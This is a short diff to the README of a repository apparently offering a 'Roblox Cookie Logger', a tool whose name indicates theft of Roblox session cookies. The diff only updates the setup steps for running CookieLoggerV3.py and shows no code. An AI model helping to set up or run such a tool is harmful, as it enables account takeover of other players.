zbenntt/Roblox-Cookie-LoggerV3/README.md

 Step 1; Download Zip and extract

-Step 2; Go To CMD cd to the directory where you saved CookieLoggerV3.py the run: python3 CookieLogger.py
+Step 2; Go To CMD cd to the directory where you saved CookieLoggerV3.py the run: pip3 install -r requirements.txt and wait the run: python3 CookieLoggerV3.py

 Step 3; Wait For gui to load